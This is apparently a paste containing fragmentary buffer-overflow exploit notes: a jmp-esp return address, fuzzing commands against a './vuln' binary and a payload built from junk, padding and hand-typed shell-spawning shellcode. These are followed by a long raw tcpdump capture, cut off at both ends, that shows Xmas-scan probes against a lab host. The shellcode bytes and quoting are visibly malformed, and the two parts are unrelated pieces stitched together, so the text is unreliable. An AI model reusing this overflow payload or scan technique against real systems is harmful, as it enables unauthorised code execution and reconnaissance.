· 4 years ago · Feb 21, 2021, 06:56 PM
1dissa objdump get address of our jmp to esp
20x80483f7
33 how much buffer can it handle
4
5./vuln 'python -c 'print "A"*1000''
6gdb r 'python -c 'print "A"*1000''+ "CCCC"'
7
8junk ="A" * {random}
9padding = "CCCC"
10jmpesp = "0x80483f7"
11shellcode = ""\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
12"\x53\x68\tty\x68\dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80
13\x31\xc0\x50\x86//ssh\x86/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
14 (6), length 40)
15 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.20221: Flags [FPU], cksum 0x8898 (correct), seq 3180585248, win 1024, urg 0, length 0
1600:43:01.227616 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
17 ip-10-10-200-226.eu-west-1.compute.internal.20221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x8cac (correct), seq 0, ack 3180585249, win 0, length 0
1800:43:01.240956 IP (tos 0x0, ttl 64, id 24641, offset 0, flags [DF], proto TCP (6), length 68)
19 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x1a81 (correct), seq 10828:10844, ack 25919214, win 6347, options [nop,nop,TS val 3431983964 ecr 997087387], length 16: HTTP
2000:43:01.241094 IP (tos 0x0, ttl 64, id 24447, offset 0, flags [DF], proto TCP (6), length 52)
21 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2ec6), seq 25919214, ack 10844, win 482, options [nop,nop,TS val 997087424 ecr 3431983964], length 0
2200:43:01.264574 IP (tos 0x0, ttl 64, id 24642, offset 0, flags [DF], proto TCP (6), length 68)
23 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc068 (correct), seq 10844:10860, ack 25919214, win 6347, options [nop,nop,TS val 3431983988 ecr 997087424], length 16: HTTP
2400:43:01.264692 IP (tos 0x0, ttl 64, id 24448, offset 0, flags [DF], proto TCP (6), length 52)
25 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2e86), seq 25919214, ack 10860, win 482, options [nop,nop,TS val 997087448 ecr 3431983988], length 0
2600:43:01.277428 IP (tos 0x0, ttl 64, id 24449, offset 0, flags [DF], proto TCP (6), length 62695)
27 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x0198), seq 25919214:25981857, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 62643: HTTP
2800:43:01.277641 IP (tos 0x0, ttl 64, id 24456, offset 0, flags [DF], proto TCP (6), length 2896)
29 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xc437), seq 25981857:25984701, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 2844: HTTP
3000:43:01.277861 IP (tos 0x0, ttl 64, id 24643, offset 0, flags [DF], proto TCP (6), length 52)
31 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2413 (correct), seq 10860, ack 25981857, win 6023, options [nop,nop,TS val 3431984001 ecr 997087461], length 0
3200:43:01.278729 IP (tos 0x0, ttl 64, id 24457, offset 0, flags [DF], proto TCP (6), length 49808)
33 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6d6c (incorrect -> 0xdba3), seq 25984701:26034457, ack 10860, win 482, options [nop,nop,TS val 997087462 ecr 3431984001], length 49756: HTTP
3400:43:01.279044 IP (tos 0x0, ttl 64, id 24644, offset 0, flags [DF], proto TCP (6), length 52)
35 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x8c8d (correct), seq 10860, ack 26020497, win 6171, options [nop,nop,TS val 3431984002 ecr 997087461], length 0
3600:43:01.279178 IP (tos 0x0, ttl 64, id 24645, offset 0, flags [DF], proto TCP (6), length 52)
37 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x5654 (correct), seq 10860, ack 26034457, win 6091, options [nop,nop,TS val 3431984002 ecr 997087462], length 0
3800:43:01.300692 IP (tos 0x0, ttl 64, id 24646, offset 0, flags [DF], proto TCP (6), length 68)
39 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x162d (correct), seq 10860:10876, ack 26034457, win 6347, options [nop,nop,TS val 3431984024 ecr 997087462], length 16: HTTP
4000:43:01.307395 IP (tos 0x0, ttl 43, id 20042, offset 0, flags [none], proto TCP (6), length 40)
41 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.50800: Flags [FPU], cksum 0x1124 (correct), seq 3180519713, win 1024, urg 0, length 0
4200:43:01.307809 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
43 ip-10-10-200-226.eu-west-1.compute.internal.50800 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0x1538 (correct), seq 0, ack 3180519714, win 0, length 0
4400:43:01.340331 IP (tos 0x0, ttl 64, id 24463, offset 0, flags [DF], proto TCP (6), length 62695)
45 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x8784), seq 26034457:26097100, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 62643: HTTP
4600:43:01.340512 IP (tos 0x0, ttl 64, id 24470, offset 0, flags [DF], proto TCP (6), length 2896)
47 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe78e), seq 26097100:26099944, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 2844: HTTP
4800:43:01.340700 IP (tos 0x0, ttl 64, id 24647, offset 0, flags [DF], proto TCP (6), length 52)
49 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6158 (correct), seq 10876, ack 26097100, win 6023, options [nop,nop,TS val 3431984064 ecr 997087524], length 0
5000:43:01.341746 IP (tos 0x0, ttl 64, id 24471, offset 0, flags [DF], proto TCP (6), length 57493)
51 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8b71 (incorrect -> 0xb438), seq 26099944:26157385, ack 10876, win 482, options [nop,nop,TS val 997087525 ecr 3431984064], length 57441: HTTP
5200:43:01.342068 IP (tos 0x0, ttl 64, id 24648, offset 0, flags [DF], proto TCP (6), length 52)
53 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x75b9 (correct), seq 10876, ack 26157385, win 6055, options [nop,nop,TS val 3431984065 ecr 997087524], length 0
5400:43:01.350522 IP (tos 0x0, ttl 64, id 24649, offset 0, flags [DF], proto TCP (6), length 68)
55 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xcc87 (correct), seq 10876:10892, ack 26157385, win 6347, options [nop,nop,TS val 3431984074 ecr 997087524], length 16: HTTP
5600:43:01.387559 IP (tos 0x0, ttl 52, id 44283, offset 0, flags [none], proto TCP (6), length 40)
57 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd368 (correct), seq 3180585248, win 1024, urg 0, length 0
5800:43:01.388017 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
59 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd77c (correct), seq 0, ack 3180585249, win 0, length 0
6000:43:01.391305 IP (tos 0x0, ttl 64, id 24478, offset 0, flags [DF], proto TCP (6), length 52)
61 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8b32), seq 26157385, ack 10892, win 482, options [nop,nop,TS val 997087575 ecr 3431984074], length 0
6200:43:01.416224 IP (tos 0x0, ttl 64, id 24650, offset 0, flags [DF], proto TCP (6), length 68)
63 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x157a (correct), seq 10892:10908, ack 26157385, win 6347, options [nop,nop,TS val 3431984139 ecr 997087575], length 16: HTTP
6400:43:01.416392 IP (tos 0x0, ttl 64, id 24479, offset 0, flags [DF], proto TCP (6), length 52)
65 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8ac8), seq 26157385, ack 10908, win 482, options [nop,nop,TS val 997087600 ecr 3431984139], length 0
6600:43:01.447462 IP (tos 0x0, ttl 64, id 24480, offset 0, flags [DF], proto TCP (6), length 62695)
67 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x5330), seq 26157385:26220028, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 62643: HTTP
6800:43:01.447640 IP (tos 0x0, ttl 64, id 24487, offset 0, flags [DF], proto TCP (6), length 2896)
69 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0x0eb5), seq 26220028:26222872, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 2844: HTTP
7000:43:01.447812 IP (tos 0x0, ttl 64, id 24651, offset 0, flags [DF], proto TCP (6), length 52)
71 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x0b41 (correct), seq 10908, ack 26184232, win 6219, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
7200:43:01.447832 IP (tos 0x0, ttl 64, id 24652, offset 0, flags [DF], proto TCP (6), length 52)
73 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x7524 (correct), seq 10908, ack 26222872, win 6007, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
7400:43:01.448819 IP (tos 0x0, ttl 64, id 24488, offset 0, flags [DF], proto TCP (6), length 53862)
75 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7d42 (incorrect -> 0x3270), seq 26222872:26276682, ack 10908, win 482, options [nop,nop,TS val 997087632 ecr 3431984171], length 53810: HTTP
7600:43:01.449091 IP (tos 0x0, ttl 64, id 24653, offset 0, flags [DF], proto TCP (6), length 52)
77 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2e34 (correct), seq 10908, ack 26240770, win 6267, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
7800:43:01.449118 IP (tos 0x0, ttl 64, id 24654, offset 0, flags [DF], proto TCP (6), length 52)
79 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xa2b1 (correct), seq 10908, ack 26276682, win 6069, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
8000:43:01.454009 IP (tos 0x0, ttl 64, id 24655, offset 0, flags [DF], proto TCP (6), length 68)
81 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x264c (correct), seq 10908:10924, ack 26276682, win 6347, options [nop,nop,TS val 3431984177 ecr 997087632], length 16: HTTP
8200:43:01.467754 IP (tos 0x0, ttl 41, id 34770, offset 0, flags [none], proto TCP (6), length 40)
83 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.2041: Flags [FPU], cksum 0xcf9c (correct), seq 3180585248, win 1024, urg 0, length 0
8400:43:01.468111 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
85 ip-10-10-200-226.eu-west-1.compute.internal.2041 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd3b0 (correct), seq 0, ack 3180585249, win 0, length 0
8600:43:01.492453 IP (tos 0x0, ttl 64, id 24656, offset 0, flags [DF], proto TCP (6), length 68)
87 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x9b2a (correct), seq 10924:10940, ack 26276682, win 6347, options [nop,nop,TS val 3431984216 ecr 997087632], length 16: HTTP
8800:43:01.492496 IP (tos 0x0, ttl 64, id 24495, offset 0, flags [DF], proto TCP (6), length 52)
89 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xb833), seq 26276682, ack 10940, win 482, options [nop,nop,TS val 997087676 ecr 3431984177], length 0
9000:43:01.525524 IP (tos 0x0, ttl 64, id 24496, offset 0, flags [DF], proto TCP (6), length 62695)
91 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xec98), seq 26276682:26339325, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 62643: HTTP
9200:43:01.525721 IP (tos 0x0, ttl 64, id 24503, offset 0, flags [DF], proto TCP (6), length 2896)
93 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd146), seq 26339325:26342169, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 2844: HTTP
9400:43:01.525900 IP (tos 0x0, ttl 64, id 24657, offset 0, flags [DF], proto TCP (6), length 52)
95 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xad71 (correct), seq 10940, ack 26339325, win 6023, options [nop,nop,TS val 3431984249 ecr 997087709], length 0
9600:43:01.526608 IP (tos 0x0, ttl 64, id 24504, offset 0, flags [DF], proto TCP (6), length 49093)
97 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6aa1 (incorrect -> 0x1828), seq 26342169:26391210, ack 10940, win 482, options [nop,nop,TS val 997087710 ecr 3431984249], length 49041: HTTP
9800:43:01.526937 IP (tos 0x0, ttl 64, id 24658, offset 0, flags [DF], proto TCP (6), length 52)
99 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xf326 (correct), seq 10940, ack 26386914, win 6123, options [nop,nop,TS val 3431984250 ecr 997087709], length 0
10000:43:01.530054 IP (tos 0x0, ttl 64, id 24659, offset 0, flags [DF], proto TCP (6), length 68)
101 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0e84 (correct), seq 10940:10956, ack 26391210, win 6347, options [nop,nop,TS val 3431984253 ecr 997087710], length 16: HTTP
10200:43:01.547948 IP (tos 0x0, ttl 53, id 48049, offset 0, flags [none], proto TCP (6), length 40)
103 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd367 (correct), seq 3180519713, win 1024, urg 0, length 0
10400:43:01.548349 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
105 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0xd77b (correct), seq 0, ack 3180519714, win 0, length 0
10600:43:01.571378 IP (tos 0x0, ttl 64, id 24510, offset 0, flags [DF], proto TCP (6), length 52)
107 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf826), seq 26391210, ack 10956, win 482, options [nop,nop,TS val 997087755 ecr 3431984253], length 0
10800:43:01.588390 IP (tos 0x0, ttl 64, id 24660, offset 0, flags [DF], proto TCP (6), length 68)
109 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x5a42 (correct), seq 10956:10972, ack 26391210, win 6347, options [nop,nop,TS val 3431984311 ecr 997087755], length 16: HTTP
11000:43:01.588572 IP (tos 0x0, ttl 64, id 24511, offset 0, flags [DF], proto TCP (6), length 52)
111 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf7cb), seq 26391210, ack 10972, win 482, options [nop,nop,TS val 997087772 ecr 3431984311], length 0
11200:43:01.620113 IP (tos 0x0, ttl 64, id 24512, offset 0, flags [DF], proto TCP (6), length 62695)
113 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x95ad), seq 26391210:26453853, ack 10972, win 482, options [nop,nop,TS val 997087803 ecr 3431984311], length 62643: HTTP
11400:43:01.620337 IP (tos 0x0, ttl 64, id 24519, offset 0, flags [DF], proto TCP (6), length 2896)
115 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xb171), seq 26453853:26456697, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984311], length 2844: HTTP
11600:43:01.620538 IP (tos 0x0, ttl 64, id 24661, offset 0, flags [DF], proto TCP (6), length 52)
117 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xed32 (correct), seq 10972, ack 26453853, win 6023, options [nop,nop,TS val 3431984344 ecr 997087803], length 0
11800:43:01.621180 IP (tos 0x0, ttl 64, id 24520, offset 0, flags [DF], proto TCP (6), length 51025)
119 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x722d (incorrect -> 0x1091), seq 26456697:26507670, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984344], length 50973: HTTP
12000:43:01.621638 IP (tos 0x0, ttl 64, id 24662, offset 0, flags [DF], proto TCP (6), length 52)
121 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xbdfb (correct), seq 10972, ack 26465646, win 6315, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
12200:43:01.621654 IP (tos 0x0, ttl 64, id 24663, offset 0, flags [DF], proto TCP (6), length 52)
123 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x1ab3 (correct), seq 10972, ack 26507670, win 6091, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
12400:43:01.624279 IP (tos 0x0, ttl 64, id 24664, offset 0, flags [DF], proto TCP (6), length 68)
125 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0234 (correct), seq 10972:10988, ack 26507670, win 6347, options [nop,nop,TS val 3431984347 ecr 997087804], length 16: HTTP
12600:43:01.628148 IP (tos 0x0, ttl 58, id 3834, offset 0, flags [none], proto TCP (6), length 40)
127 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.50002: Flags [FPU], cksum 0x1443 (correct), seq 3180585248, win 1024, urg 0, length 0
12800:43:01.628589 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
129 ip-10-10-200-226.eu-west-1.compute.internal.50002 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x1857 (correct), seq 0, ack 3180585249, win 0, length 0
13000:43:01.667290 IP (tos 0x0, ttl 64, id 24526, offset 0, flags [DF], proto TCP (6), length 52)
131 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x305b), seq 26507670, ack 10988, win 482, options [nop,nop,TS val 997087851 ecr 3431984347], length 0
13200:43:01.673072 IP (tos 0x0, ttl 64, id 24665, offset 0, flags [DF], proto TCP (6), length 68)
133 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x80d0 (correct), seq 10988:11004, ack 26507670, win 6347, options [nop,nop,TS val 3431984396 ecr 997087851], length 16: HTTP
13400:43:01.673229 IP (tos 0x0, ttl 64, id 24527, offset 0, flags [DF], proto TCP (6), length 52)
135 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x3014), seq 26507670, ack 11004, win 482, options [nop,nop,TS val 997087857 ecr 3431984396], length 0
13600:43:01.693950 IP (tos 0x0, ttl 64, id 24528, offset 0, flags [DF], proto TCP (6), length 62695)
137 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xa00a), seq 26507670:26570313, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 62643: HTTP
13800:43:01.694174 IP (tos 0x0, ttl 64, id 24535, offset 0, flags [DF], proto TCP (6), length 2896)
139 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd4cf), seq 26570313:26573157, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 2844: HTTP
14000:43:01.694314 IP (tos 0x0, ttl 64, id 24666, offset 0, flags [DF], proto TCP (6), length 52)
141 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd367 (correct), seq 11004, ack 26525568, win 6267, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
14200:43:01.694357 IP (tos 0x0, ttl 64, id 24667, offset 0, flags [DF], proto TCP (6), length 52)
143 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2592 (correct), seq 11004, ack 26570313, win 6023, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
14400:43:01.695237 IP (tos 0x0, ttl 64, id 24536, offset 0, flags [DF], proto TCP (6), length 56372)
145 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8710 (incorrect -> 0xb84e), seq 26573157:26629477, ack 11004, win 482, options [nop,nop,TS val 997087879 ecr 3431984417], length 56320: HTTP
14600:43:01.695565 IP (tos 0x0, ttl 64, id 24668, offset 0, flags [DF], proto TCP (6), length 52)
147 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd395 (correct), seq 11004, ack 26591055, win 6267, options [nop,nop,TS val 3431984419 ecr 997087877], length 0
14800:43:01.695663 IP (tos 0x0, ttl 64, id 24669, offset 0, flags [DF], proto TCP (6), length 52)
149 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x3e51 (correct), seq 11004, ack 26629477, win 6055, options [nop,nop,TS val 3431984419 ecr 997087879], length 0
15000:43:01.704028 IP (tos 0x0, ttl 64, id 24670, offset 0, flags [DF], proto TCP (6), length 68)
151 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x8f6b (correct), seq 11004:11020, ack 26629477, win 6347, options [nop,nop,TS val 3431984427 ecr 997087879], length 16: HTTP
15200:43:01.708350 IP (tos 0x0, ttl 44, id 26586, offset 0, flags [none], proto TCP (6), length 40)
153 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.3221: Flags [FPU], cksum 0xcb00 (correct), seq 3180585248, win 1024, urg 0, length 0
15400:43:01.708843 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
155 ip-10-10-200-226.eu-west-1.compute.internal.3221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xcf14 (correct), seq 0, ack 3180585249, win 0, length 0
15600:43:01.738530 IP (tos 0x0, ttl 64, id 24671, offset 0, flags [DF], proto TCP (6), length 70)
157 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0d86 (correct), seq 11020:11038, ack 26629477, win 6347, options [nop,nop,TS val 3431984462 ecr 997087879], length 18: HTTP
15800:43:01.738578 IP (tos 0x0, ttl 64, id 24543, offset 0, flags [DF], proto TCP (6), length 52)
159 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x53c1), seq 26629477, ack 11038, win 482, options [nop,nop,TS val 997087922 ecr 3431984427], length 0
16000:43:01.763935 IP (tos 0x0, ttl 64, id 24672, offset 0, flags [DF], proto TCP (6), length 68)
161 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xfe5e (correct), seq 11038:11054, ack 26629477, win 6347, options [nop,nop,TS val 3431984487 ecr 997087922], length 16: HTTP
16200:43:01.788549 IP (tos 0x0, ttl 50, id 61856, offset 0, flags [none], proto TCP (6), length 40)
163 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.5800: Flags [FPU], cksum 0xc0ed (correct), seq 3180585248, win 1024, urg 0, length 0
16400:43:01.789163 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
165 ip-10-10-200-226.eu-west-1.compute.internal.5800 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xc501 (correct), seq 0, ack 3180585249, win 0, length 0
16600:43:01.798617 IP (tos 0x0, ttl 64, id 24673, offset 0, flags [DF], proto TCP (6), length 68)
167 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc159 (correct), seq 11054:11070, ack 26629477, win 6347, options [nop,nop,TS val 3431984522 ecr 997087922], length 16: HTTP
16800:43:01.798659 IP (tos 0x0, ttl 64, id 24544, offset 0, flags [DF], proto TCP (6), length 52)
169 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x5329), seq 26629477, ack 11070, win 482, options [nop,nop,TS val 997087982 ecr 3431984487], length 0
17000:43:01.806357 IP (tos 0x0, ttl 64, id 24545, offset 0, flags [DF], proto TCP (6), length 62695)
171 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x4ffe), seq 26629477:26692120, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 62643: HTTP
17200:43:01.806595 IP (tos 0x0, ttl 64, id 24552, offset 0, flags [DF], proto TCP (6), length 2896)
173 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xfc4f), seq 26692120:26694964, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 2844: HTTP
17400:43:01.806779 IP (tos 0x0, ttl 64, id 24674, offset 0, flags [DF], proto TCP (6), length 52)
175 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x48a1 (correct), seq 11070, ack 26692120, win 6019, options [nop,nop,TS val 3431984530 ecr 997087990], length 0
17600:43:01.808183 IP (tos 0x0, ttl 64, id 24553, offset 0, flags [DF], proto TCP (6), length 52618)
